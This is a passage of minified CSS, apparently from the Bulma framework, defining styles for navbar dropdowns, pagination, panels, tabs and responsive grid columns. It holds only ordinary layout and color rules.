.navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px rgba(10,10,10,.1);display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#3273dc}.navbar-dropdown.is-boxed,.navbar.is-spaced 
.navbar-dropdown{border-radius:6px;border-top:none;box-shadow:0 8px 8px rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.1);display:block;opacity:0;pointer-events:none;top:calc(100% + (-4px));transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.container>.navbar .navbar-brand,.navbar>.container .navbar-brand{margin-left:-.75rem}.container>.navbar .navbar-menu,.navbar>.container .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-desktop{top:0}body.has-navbar-fixed-top-desktop,html.has-navbar-fixed-top-desktop{padding-top:3.25rem}body.has-navbar-fixed-bottom-desktop,html.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}body.has-spaced-navbar-fixed-top,html.has-spaced-navbar-fixed-top{padding-top:5.25rem}body.has-spaced-navbar-fixed-bottom,html.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}.navbar-link.is-active,a.navbar-item.is-active{color:#0a0a0a}.navbar-link.is-active:not(:focus):not(:hover),a.navbar-item.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown.is-active .navbar-link,.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-next,.pagination.is-rounded .pagination-previous{padding-left:1em;padding-right:1em;border-radius:290486px}.pagination.is-rounded 
.pagination-link{border-radius:290486px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-link,.pagination-next,.pagination-previous{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-link:hover,.pagination-next:hover,.pagination-previous:hover{border-color:#b5b5b5;color:#363636}.pagination-link:focus,.pagination-next:focus,.pagination-previous:focus{border-color:#3273dc}.pagination-link:active,.pagination-next:active,.pagination-previous:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2)}.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled]{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-next,.pagination-previous{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#3273dc;border-color:#3273dc;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}@media screen and (max-width:768px){.pagination{flex-wrap:wrap}.pagination-next,.pagination-previous{flex-grow:1;flex-shrink:1}.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width:769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 
0 0 1px rgba(10,10,10,.02);font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#3273dc;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#3273dc}.panel.is-link .panel-block.is-active .panel-icon{color:#3273dc}.panel.is-info .panel-heading{background-color:#3298dc;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3298dc}.panel.is-info .panel-block.is-active .panel-icon{color:#3298dc}.panel.is-success .panel-heading{background-color:#48c774;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c774}.panel.is-success .panel-block.is-active .panel-icon{color:#48c774}.panel.is-warning .panel-heading{background-color:#ffdd57;color:rgba(0,0,0,.7)}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffdd57}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffdd57}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger 
.panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-block:not(:last-child),.panel-tabs:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#3273dc}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#3273dc;color:#363636}.panel-block.is-active .panel-icon{color:#3273dc}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#3273dc;color:#3273dc}.tabs 
ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-radius:4px 0 0 4px}.tabs.is-toggle li:last-child a{border-radius:0 4px 4px 0}.tabs.is-toggle li.is-active a{background-color:#3273dc;border-color:#3273dc;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:290486px;border-top-left-radius:290486px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child 
a{border-bottom-right-radius:290486px;border-top-right-radius:290486px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:no
ne;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and 
(max-width:768px){.column.is-narrow-mobile{flex:none}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{ma
rgin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width:769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,
.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and 
(max-width:1023px){.column.is-narrow-touch{flex:none}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{f
lex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width:1024px){.column.is-narrow-desktop{flex:none}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.
66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width:1216px){.column.is-narrow-widescreen{flex:none}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-o
ffset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width:1408px){.column.is-narrow-fullhd{flex:none}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0}.column.is-1-fullhd{flex:none;width:8
.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:calc(1.5rem - .75rem)}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width:769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width:1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap:0.75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable 
.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap:0rem}@media screen and (max-width:768px){.columns.is-variable.is-0-mobile{--columnGap:0rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-0-tablet{--columnGap:0rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-0-tablet-only{--columnGap:0rem}}@media screen and (max-width:1023px){.columns.is-variable.is-0-touch{--columnGap:0rem}}@media screen and (min-width:1024px){.columns.is-variable.is-0-desktop{--columnGap:0rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-0-desktop-only{--columnGap:0rem}}@media screen and (min-width:1216px){.columns.is-variable.is-0-widescreen{--columnGap:0rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-0-widescreen-only{--columnGap:0rem}}@media screen and (min-width:1408px){.columns.is-variable.is-0-fullhd{--columnGap:0rem}}.columns.is-variable.is-1{--columnGap:0.25rem}@media screen and (max-width:768px){.columns.is-variable.is-1-mobile{--columnGap:0.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-1-tablet{--columnGap:0.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-1-tablet-only{--columnGap:0.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-1-touch{--columnGap:0.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-1-desktop{--columnGap:0.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-1-desktop-only{--columnGap:0.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-1-widescreen{--columnGap:0.25rem}}@media screen and 